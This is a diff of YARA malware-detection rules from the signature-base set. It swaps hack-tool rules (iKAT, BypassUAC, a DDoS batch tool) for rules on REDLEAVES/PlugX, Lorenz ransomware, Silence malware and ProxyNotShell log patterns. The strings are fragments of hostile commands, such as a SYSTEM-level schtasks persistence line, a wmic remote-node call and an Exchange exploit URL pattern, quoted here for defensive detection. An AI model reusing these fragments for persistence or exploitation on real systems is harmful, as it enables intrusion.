-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L837-L858"
+		description = "Detects a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX"
+		author = "USG"
+		id = "2e7cdedd-2358-5d71-a3ec-73dec442d840"
+		date = "2017-04-28"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L9-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
-		logic_hash = "a39f8e388aa11c732156753f4a19aa9cc3ccd0437de30cdcc608926320a089b0"
+		logic_hash = "51d8a0785bc25cf02460b9b7490ccba3d67806c953e6aa3d3882341ce11857fa"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. "
 
 	strings:
-		$s0 = "Extended Module: super mario brothers" fullword ascii
-		$s1 = "Extended Module: " fullword ascii
-		$s3 = "ofpurenostalgicfeeling" fullword ascii
-		$s8 = "-supermariobrotheretic" fullword ascii
-		$s9 = "!http://132.147.96.202:80" fullword ascii
-		$s12 = "iKAT Exe Template" fullword ascii
-		$s15 = "withadancyflavour.." fullword ascii
-		$s16 = "FastTracker v2.00   " fullword ascii
+		$UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65}
+		$PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64}
 
 	condition:
-		4 of them
+		any of them
 }
-rule SIGNATURE_BASE_Ikat_Cmd_As_Dll
+rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Implantloader_Starburn
 {
 	meta:
-		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8d15b4b6-25f3-556c-bfa8-eba503c9c649"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L860-L878"
+		description = "Detects the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT"
+		author = "USG"
+		id = "976f42b1-58c9-554b-97e6-130a657507e2"
+		date = "2017-04-28"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L23-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
-		logic_hash = "3f8390fb6eb16749e63379222a5899b811e7ccd6b3b219b60d7a621fd4595e7b"
-		score = 65
+		logic_hash = "2ebfdaf363ac80bc9bace3056ff86efd9c1b246c6f60373a82df4a0db901a6e3"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		true_positive = "7f8a867a8302fe58039a6db254d335ae"
 
 	strings:
-		$s1 = "cmd.exe" fullword wide
-		$s2 = "ReactOS Development Team" fullword wide
-		$s3 = "ReactOS Command Processor" fullword wide
-		$ext = "extension: .dll" nocase
+		$XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10}
 
 	condition:
-		all of ( $s* ) and $ext
+		any of them
 }
-rule SIGNATURE_BASE_Ikat_Tools_Nmap
+rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Obfuscatedshellcodeandrat_Handkerchief
 {
 	meta:
-		description = "Generic rule for NMAP - based on NMAP 4 standalone"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be4858e6-a8f3-55eb-9c04-f4def838dde1"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L880-L897"
+		description = "Detects obfuscated .dat file containing shellcode and core REDLEAVES RAT"
+		author = "USG"
+		id = "51a28529-1084-5f24-9369-6427e8d51d9d"
+		date = "2017-04-28"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L36-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
-		logic_hash = "f538d807ed4904a2c321385a095a97bc0d718349f7eb31a367e521228412cef2"
-		score = 50
+		logic_hash = "f91bd1ddd6691a0a5b6ebc6a28d35bb5b2e6c00754f07e58ffb01e06ad590ae3"
+		score = 75
 		quality = 83
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		true_positive = "fb0c714cd2ebdcc6f33817abe7813c36"
 
 	strings:
-		$s0 = "Insecure.Org" fullword wide
-		$s1 = "Copyright (c) Insecure.Com" fullword wide
-		$s2 = "nmap" fullword nocase
-		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
+		$RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d}
 
 	condition:
-		all of them
+		any of them
 }
-rule SIGNATURE_BASE_Ikat_Startbar
+rule SIGNATURE_BASE_REDLEAVES_Coreimplant_Uniquestrings : FILE
 {
 	meta:
-		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f29f15e9-aa29-519a-b4ad-c018aac68fd6"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L899-L919"
+		description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state"
+		author = "USG"
+		id = "fd4d4804-f7d9-549d-8f63-5f409d6180f9"
+		date = "2018-12-20"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L49-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
-		logic_hash = "adb29d4903a771b0dab9dee8313878757ff12fc014da86291e32eb3ec60bf551"
-		score = 50
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "ce6ab0f4007f3ea3c31442cab702ad3579faa6835d5ee9b4c03516ce0499bf3e"
+		score = 75
+		quality = 81
+		tags = "FILE"
 
 	strings:
-		$s2 = "Shinysoft Limited1" fullword ascii
-		$s3 = "Shinysoft Limited0" fullword ascii
-		$s4 = "Wellington1" fullword ascii
-		$s6 = "Wainuiomata1" fullword ascii
-		$s8 = "56 Wright St1" fullword ascii
-		$s9 = "UTN-USERFirst-Object" fullword ascii
-		$s10 = "New Zealand1" fullword ascii
+		$unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii
+		$unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii
+		$unique7 = "\\NamePipe_MoreWindows" wide ascii
 
 	condition:
-		all of them
+		not uint32( 0 ) == 0x66676572 and any of them
 }
-rule SIGNATURE_BASE_Ikat_Tool_Generic
+rule SIGNATURE_BASE_PLUGX_Redleaves
 {
 	meta:
-		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a8064a26-09c0-59f1-bdf9-628a445014ff"
-		date = "2014-05-11"
-		modified = "2025-12-18"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L921-L947"
+		description = "Detects specific RedLeaves and PlugX binaries"
+		author = "US-CERT Code Analysis Team"
+		id = "ede8ad8f-31cf-5314-9777-bddd60e499f2"
+		date = "2017-03-04"
+		date = "2017-04-03"
+		modified = "2024-04-17"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uscert_ta17-1117a.yar#L66-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5c5aa2d7d82d4b65541c5b6bcae6260fdaed0030493ed689363722cd78fd0a26"
-		score = 55
+		logic_hash = "0c52110eb18dcdb7a0d4b8c42f22368acdd1bce44a192abcd71a20bee2705475"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
-		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
-		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
+		incident = "10118538"
+		MD5_1 = "598FF82EA4FB52717ACAFB227C83D474"
+		MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032"
+		MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630"
+		MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83"
+		MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D"
 
 	strings:
-		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
-		$s1 = "Failed to read the entire file" fullword
-		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
-		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
-		$s9 = "Running Zip pipeline..." fullword
-		$s10 = "<FinTitle />" fullword
-		$s12 = "<AutoTemp>0</AutoTemp>" fullword
-		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
-		$s15 = "AES Encrypting..." fullword
-		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
+		$s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 }
+		$s1 = "C:\\Users\\user\\Desktop\\my_OK_2014\\bit9\\runsna\\Release\\runsna.pdb"
+		$s2 = "d:\\work\\plug4.0(shellcode)"
+		$s3 = "\\shellcode\\shellcode\\XSetting.h"
+		$s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 }
+		$s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 }
+		$s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 }
+		$s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 }
+		$s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 }
+		$s9 = "RedLeavesCMDSimulatorMutex"
 
 	condition:
-		all of them
+		$s0 or $s1 or $s2 and $s3 or $s4 or $s5 or $s6 or $s7 or $s8 or $s9
 }
-rule SIGNATURE_BASE_Bypassuac2
+
+rule SIGNATURE_BASE_SUSP_Adobepdf_SFX_Bitmap_Combo_Executable : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUac2.zip"
-		author = "yarGen Yara Rule Generator"
-		id = "8b7e49de-9b0a-5dc4-86af-1a854dc649cc"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L949-L961"
+		description = "Detects a suspicious executable that contains both a SFX icon and an Adobe PDF icon"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2d078c9-fbe5-51f4-8f7e-5d943c5a8197"
+		date = "2020-11-02"
+		modified = "2023-12-05"
+		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_icon_anomalies.yar#L3-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
-		logic_hash = "398783fa0453a60fd1c6aa64eacfbfa7c5385e81c79d1b6a8a8386dae9b825cc"
-		score = 75
+		logic_hash = "ac515d698507be6085684a6ec4622c6f3c26d0c3a0d94cbbeacfab7dfb9fe135"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
 
 	strings:
-		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
-		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
-		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
+		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
+               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
+               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
+               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
+               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
+               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
+               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
+               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
+               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
+               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
+               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
+               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
+		$sc2 = { 28 66 27 00 60 00 00 00 80 00 00 00 80 80 80 00
+               C0 C0 C0 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
+               FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
+               FF FF FF 00 FF FF FF 00 5D 33 00 00 5D 33 00 00
+               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00
+               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_Bypassuac_3
+
+rule SIGNATURE_BASE_SUSP_Adobepdf_Bitmap_Executable : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUacDll.dll"
-		author = "yarGen Yara Rule Generator"
-		id = "407a8e12-1160-584d-94c8-7aa78e29c754"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L963-L976"
+		description = "Detects a suspicious executable that contains a Adobe PDF icon and no shows no sign of actual Adobe software"
+		author = "Florian Roth (Nextron Systems)"
+		id = "86ebadd4-64a8-5290-b45e-ac125a10ea66"
+		date = "2020-11-02"
+		modified = "2023-12-05"
+		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_icon_anomalies.yar#L39-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1974aacd0ed987119999735cad8413031115ce35"
-		logic_hash = "cf3183ff4562f2962f87bc594c1710c73c113fa1d49fa56f7a3ff391ba4b9003"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "a8ef5ce2e876565c7d6367ce555d00bd3535699f1907f867811f2f6749672c67"
+		score = 60
+		quality = 85
+		tags = "FILE"
+		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
 
 	strings:
-		$s0 = "BypassUacDLL.dll" fullword wide
-		$s1 = "\\Release\\BypassUacDll" ascii
-		$s3 = "Win7ElevateDLL" fullword wide
-		$s7 = "BypassUacDLL" fullword wide
+		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
+               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
+               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
+               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
+               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
+               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
+               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
+               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
+               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
+               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
+               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
+               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
+		$fp1 = "Adobe" ascii wide fullword
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and $sc1 and not 1 of ( $fp* ) and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_Bypassuacdll_6
+rule SIGNATURE_BASE_MAL_RANSOM_Lorenz_May21_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		id = "5be27053-446f-5ea3-a242-2661aeffa3df"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L994-L1005"
+		description = "Detects Lorenz Ransomware samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b18a4a3-82da-574b-8d10-daf2176448b9"
+		date = "2021-05-04"
+		modified = "2023-12-05"
+		reference = "Internal Research - DACH TE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_lorenz.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-		logic_hash = "3cb89875ddf79a3709aeb58149e228e03b9fb43fa1565aab5ece743857b4cc71"
+		logic_hash = "aec940deb2c3bc099a50a2e8f014ae425d306d331078d9ac2abc2ec7b8bf572e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "4b1170f7774acfdc5517fbe1c911f2bd9f1af498f3c3d25078f05c95701cc999"
+		hash2 = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1"
+		hash3 = "c0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb"
 
 	strings:
-		$s3 = "BypassUacDLL.dll" fullword wide
-		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
+		$x1 = "process call create \"cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON " ascii fullword
+		$x2 = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK" ascii fullword
+		$s1 = "process call create \"cmd.exe /c schtasks /Create /F " ascii fullword
+		$s2 = "twr.ini" ascii fullword
+		$s3 = "/c wmic /node:'" ascii fullword
+		$op1 = { 0f 4f d9 81 ff dc 0f 00 00 5f 8d 4b 0? 0f 4e cb 83 fe 3c 5e 5b }
+		$op2 = { 6a 02 e8 ?? ?? 0? 00 83 c4 18 83 f8 01 75 01 cc 6a 00 68 ?? ?? 00 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 1 of ( $x* ) or all of ( $op* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Bypassuac_EXE
+rule SIGNATURE_BASE_EXPL_Exchange_Proxynotshell_Patterns_CVE_2022_41040_Oct22_1 : SCRIPT
 {
 	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		id = "b88aded5-7dfb-5cdf-bb42-cd8b069259e0"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1007-L1021"
+		description = "Detects successful ProxyNotShell exploitation attempts in log files (attempt to identify the attack before the official release of detailed information)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2812fcd-0a20-5bbd-a9e1-9cca1ed58aa3"
+		date = "2022-10-11"
+		modified = "2023-03-15"
+		old_rule_name = "EXPL_Exchange_ProxyNoShell_Patterns_CVE_2022_41040_Oct22_1"
+		reference = "https://github.com/kljunowsky/CVE-2022-41040-POC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2022_41040_proxynoshell.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-		logic_hash = "0283efd6866ed9417f2d255715f04c0ed6d7a89befce6a3a52c22ac06593c0bd"
+		logic_hash = "81b0f0fea2762beb47826ff95545c87e960e098b9d5f45eacfe07b3ecf319ac5"
 		score = 75
 		quality = 60
-		tags = ""
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "Wole32.dll" wide
-		$s3 = "System32\\migwiz" wide
-		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
-		$s5 = "Elevation:Administrator!new:" wide
-		$s6 = "BypassUac" wide
+		$sr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}owershell/ nocase ascii
+		$sa1 = " 200 "
+		$fp1 = " 444 "
+		$fp2 = " 404 "
+		$fp2b = " 401 "
+		$fp3 = "GET /owa/ &Email=autodiscover/autodiscover.json%3F@test.com&ClientId=" ascii
+		$fp4 = "@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" ascii
 
 	condition:
-		all of them
+		$sr1 and 1 of ( $sa* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_Proxy_Malware_Packed_Dev
+
+rule SIGNATURE_BASE_Silence_Malware_1 : FILE
 {
 	meta:
-		description = "APT Malware - Proxy"
-		author = "FRoth"
-		id = "0b81b6c9-86fa-59c1-b58c-80310f6c0680"
-		date = "2014-11-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1023-L1037"
+		description = "Detects malware sample mentioned in the Silence report on Securelist"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f932e3fe-a2d7-55b7-b581-88c0ed45723e"
+		date = "2017-11-01"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/the-silence/83009/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_silence.yar#L13-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6b6a86ceeab64a6cb273debfa82aec58"
-		logic_hash = "64b15aaf93b40744b887c75fa26f4996d72045a55ac82ab4de89a0d9a3714684"
-		score = 50
+		logic_hash = "b88795268c080fe19f7e185d1542b520616fe6c00bae23a99981aa1ee8abacb3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f24b160e9e9d02b8e31524b8a0b30e7cdc66dd085e24e4c58240e4c4b6ec0ac2"
 
 	strings:
-		$string0 = "PECompact2" fullword
-		$string1 = "[LordPE]"
-		$string2 = "steam_ker.dll"
+		$x1 = "adobeudp.exe" fullword wide
+		$x2 = "%s\\adobeudp.exeZone.Identifier" fullword ascii
+		$x3 = "%s\\igfxpers_%08x.exe" fullword ascii
+		$x4 = "%s\\adobeudp.exe" fullword ascii
+		$s1 = "SoftWare\\MicroSoft\\Windows\\CurrentVersion\\Run" fullword ascii
+		$s2 = "Copyright (C)  1999 - 2017" fullword wide
+		$s3 = "%sget.php?name=%x" fullword ascii
+		$s4 = "VNASSRUNXYC" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e03edb9bd7cbe200dc59f361db847f8a" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Tzddos_Ddos_Tool_CN
+
+rule SIGNATURE_BASE_Silence_Malware_2 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file tzddos"
+		description = "Detects malware sample mentioned in the Silence report on Securelist"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf2bfc7b-4db8-5d35-a312-2530a42985d5"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1039-L1058"
+		id = "e4c7d753-fd04-5e11-9960-1ad238039c11"
+		date = "2017-11-01"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/the-silence/83009/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_silence.yar#L40-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
-		logic_hash = "fed09a8586f9b573e46871efa71082f4573d2bd069fde9cc2928b267d0025bab"
-		score = 60
+		logic_hash = "8cb6320eac984b7a332c1c84582a7ca7e90d409e518106c4e7655948f6863889"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27"
 
 	strings:
-		$s0 = "for /f %%a in (host.txt) do (" ascii
-		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
-		$s2 = "del host.txt /q" fullword ascii
-		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s4 = "start Http.exe %%a %http%" fullword ascii
-		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
-		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
+		$x1 = "\\ScreenMonitorService\\Release\\smmsrv.pdb" ascii
+		$x2 = "\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}" fullword ascii
+		$s1 = "My Sample Service: ServiceMain: SetServiceStatus returned error" fullword ascii
+		$s2 = "\\mss.exe" ascii
+		$s3 = "\\out.dat" ascii
+		$s4 = "\\mss.txt" ascii
+		$s5 = "Default monitor" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "69f3ec173efb6fd3ab5f79e0f8051335" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Ncat_Hacktools_CN
+rule SIGNATURE_BASE_APT_MAL_BKA_Goldenspy_Aug20_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file nc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bdbfaf75-f8c0-508e-b6b1-9ddea179a325"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
